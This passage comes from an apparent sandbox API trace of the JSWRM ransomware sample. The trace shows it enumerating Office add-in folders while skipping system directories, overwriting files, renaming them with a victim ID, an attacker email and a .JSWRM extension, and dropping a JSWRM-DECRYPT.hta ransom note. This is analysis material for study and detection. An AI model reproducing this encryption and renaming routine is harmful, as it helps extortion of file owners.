lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x20dde8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0125.038] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224b30 | out: hHeap=0x1e0000) returned 1 [0125.038] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224cc8 [0125.039] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0125.039] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d578 [0125.039] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x20d578, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0125.039] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224cc8 | out: hHeap=0x1e0000) returned 1 [0125.039] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23f848 [0125.039] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f280 | out: hHeap=0x1e0000) returned 1 [0125.039] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d578 | out: hHeap=0x1e0000) returned 1 [0125.039] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0125.039] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x15b24c93, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x15b24c93, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x15b4aee2, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x505dc, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="PowerViewRes.pl.xap", cAlternateFileName="POWERV~1.XAP")) returned 1 [0125.039] lstrcmpiW (lpString1="PowerViewRes.pl.xap", lpString2=".") returned 1 [0125.039] lstrcmpiW (lpString1="PowerViewRes.pl.xap", lpString2="..") returned 1 [0125.039] lstrcmpiW (lpString1="PowerViewRes.pl.xap", lpString2="...") returned 1 [0125.039] lstrcmpiW (lpString1="PowerViewRes.pl.xap", lpString2="windows") returned -1 [0125.039] lstrcmpiW (lpString1="PowerViewRes.pl.xap", lpString2="recovery") returned -1 [0125.039] lstrcmpiW (lpString1="PowerViewRes.pl.xap", lpString2="perflogs") returned 1 [0125.039] lstrcmpiW (lpString1="PowerViewRes.pl.xap", lpString2="documents and settings") returned 1 [0125.039] lstrcmpiW (lpString1="PowerViewRes.pl.xap", lpString2="$RECYCLE.BIN") returned 1 [0125.039] lstrcmpiW (lpString1="PowerViewRes.pl.xap", lpString2="system volume information") returned -1 [0125.039] lstrcmpiW (lpString1="PowerViewRes.pl.xap", lpString2="msocache") returned 1 [0125.039] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.pl.xap", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0125.039] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.pl.xap", cchWideChar=19, lpMultiByteStr=0x241268, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerViewRes.pl.xap", lpUsedDefaultChar=0x0) returned 19 [0125.039] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0125.039] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.pl.xap", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0125.039] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.pl.xap", cchWideChar=19, lpMultiByteStr=0x241290, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerViewRes.pl.xap", lpUsedDefaultChar=0x0) returned 19 [0125.039] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0125.039] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f848 | out: hHeap=0x1e0000) returned 1 [0125.039] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0125.039] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e22c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0125.039] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\pl\\PowerViewRes.pl.xap" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\pl\\powerviewres.pl.xap"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0125.040] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x345e1c0 | out: lpFileSize=0x345e1c0*=329180) returned 1 [0125.040] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0125.041] ReadFile (in: hFile=0x338, lpBuffer=0x24f1e0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e1cc, lpOverlapped=0x0 | out: lpBuffer=0x24f1e0*, lpNumberOfBytesRead=0x345e1cc*=0x27100, lpOverlapped=0x0) returned 1 [0125.085] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0125.085] WriteFile (in: hFile=0x338, lpBuffer=0x24f1e0*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e1c8, lpOverlapped=0x0 | out: lpBuffer=0x24f1e0*, lpNumberOfBytesWritten=0x345e1c8*=0x27100, lpOverlapped=0x0) returned 1 [0125.086] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24f1e0 | out: hHeap=0x1e0000) returned 1 [0125.086] CloseHandle (hObject=0x338) returned 1 [0125.086] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0125.086] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0125.086] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0125.086] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0125.086] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a420, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0125.086] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a420 | out: hHeap=0x1e0000) returned 1 [0125.086] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bad8 | out: hHeap=0x1e0000) returned 1 [0125.086] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0125.086] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\pl\\PowerViewRes.pl.xap" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\pl\\powerviewres.pl.xap"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\pl\\PowerViewRes.pl.xap.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\pl\\powerviewres.pl.xap.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0125.088] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0125.088] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22e358 | out: hHeap=0x1e0000) returned 1 [0125.088] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22f6c0 | out: hHeap=0x1e0000) returned 1 [0125.088] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0125.088] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0125.088] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x15b24c93, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x15b24c93, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x15b4aee2, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x505dc, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="PowerViewRes.pl.xap", cAlternateFileName="POWERV~1.XAP")) returned 0 [0125.088] FindClose (in: hFindFile=0x231f40 | out: hFindFile=0x231f40) returned 1 [0125.089] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ea18 | out: hHeap=0x1e0000) returned 1 [0125.089] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236468 | out: hHeap=0x1e0000) returned 1 [0125.089] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236a28 | out: hHeap=0x1e0000) returned 1 [0125.089] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeff0bc27, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x15bbd5ad, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x15bbd5ad, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf1550, dwReserved1=0x0, cFileName="pt", cAlternateFileName="")) returned 1 [0125.089] lstrcmpiW (lpString1="pt", lpString2=".") returned 1 [0125.089] lstrcmpiW (lpString1="pt", lpString2="..") returned 1 [0125.089] lstrcmpiW (lpString1="pt", lpString2="...") returned 1 [0125.089] lstrcmpiW (lpString1="pt", lpString2="windows") returned -1 [0125.089] lstrcmpiW (lpString1="pt", lpString2="recovery") returned -1 [0125.089] lstrcmpiW (lpString1="pt", lpString2="perflogs") returned 1 [0125.089] lstrcmpiW (lpString1="pt", lpString2="documents and settings") returned 1 [0125.089] lstrcmpiW (lpString1="pt", lpString2="$RECYCLE.BIN") returned 1 [0125.090] lstrcmpiW (lpString1="pt", lpString2="system volume information") returned -1 [0125.090] lstrcmpiW (lpString1="pt", lpString2="msocache") returned 1 [0125.090] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0125.090] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2360d0 | out: hHeap=0x1e0000) returned 1 [0125.090] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\pt\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\pt\\jswrm-decrypt.hta")) returned 0xffffffff [0125.092] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ddc8 | out: hHeap=0x1e0000) returned 1 [0125.092] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0125.092] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b424, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0125.092] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0125.092] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24e1d8 [0125.093] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0125.093] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24ffa8 [0125.093] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0125.093] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235bc8 [0125.093] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dcb0 [0125.093] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235bc8 | out: hHeap=0x1e0000) returned 1 [0125.093] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\pt\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\pt\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0125.095] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0125.095] WriteFile (in: hFile=0x314, lpBuffer=0x345b538*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b504, lpOverlapped=0x0 | out: lpBuffer=0x345b538*, lpNumberOfBytesWritten=0x345b504*=0x230c, lpOverlapped=0x0) returned 1 [0125.096] CloseHandle (hObject=0x314) returned 1 [0125.096] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dcb0 | out: hHeap=0x1e0000) returned 1 [0125.096] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\pt\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\pt\\jswrm-decrypt.hta")) returned 0x20 [0125.097] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\pt\\*.*", lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeff0bc27, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x15bbd5ad, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x4139f67e, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName=".", cAlternateFileName="")) returned 0x232100 [0125.097] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0125.097] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeff0bc27, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x15bbd5ad, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x4139f67e, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="..", cAlternateFileName="")) returned 1 [0125.097] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0125.097] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0125.097] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfc32591f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfc32591f, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x1624bdaa, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xc4a60, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="AdHocReportingExcelClient.dll", cAlternateFileName="ADHOCR~1.DLL")) returned 1 [0125.097] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2=".") returned 1 [0125.097] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="..") returned 1 [0125.097] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="...") returned 1 [0125.097] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="windows") returned -1 [0125.097] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="recovery") returned -1 [0125.097] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="perflogs") returned -1 [0125.097] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="documents and settings") returned -1 [0125.097] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="$RECYCLE.BIN") returned 1 [0125.097] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="system volume information") returned -1 [0125.097] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="msocache") returned -1 [0125.097] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0125.097] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0125.097] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0125.097] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x240f48, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdHocReportingExcelClient.dll", lpUsedDefaultChar=0x0) returned 29 [0125.097] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0125.097] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0125.097] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x240fe8, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdHocReportingExcelClient.dll", lpUsedDefaultChar=0x0) returned 29 [0125.097] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4139f67e, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x4139f67e, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x4139f67e, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0125.097] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0125.097] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0125.098] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0125.098] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0125.098] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0125.098] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0125.098] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0125.098] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0125.098] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0125.098] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0125.098] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0125.098] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0125.098] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0125.098] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241010, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0125.098] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0125.098] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0125.098] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241308, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0125.098] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf4cd4a32, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf4cd4a32, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf4cd4a32, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x12ac0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.PowerBI.Diagnostics.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0125.098] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2=".") returned 1 [0125.098] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="..") returned 1 [0125.098] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="...") returned 1 [0125.098] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="windows") returned -1 [0125.098] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="recovery") returned -1 [0125.098] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="perflogs") returned -1 [0125.098] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="documents and settings") returned 1 [0125.098] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0125.098] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="system volume information") returned -1 [0125.098] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="msocache") returned -1 [0125.098] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x2330f8 [0125.098] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0125.098] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0125.098] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x22d0a0, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.PowerBI.Diagnostics.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0125.098] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0125.098] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0125.098] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x22cdc8, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.PowerBI.Diagnostics.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0125.099] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x443f20, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x443f20, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x4903b8, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x13078, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0125.099] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2=".") returned 1 [0125.099] 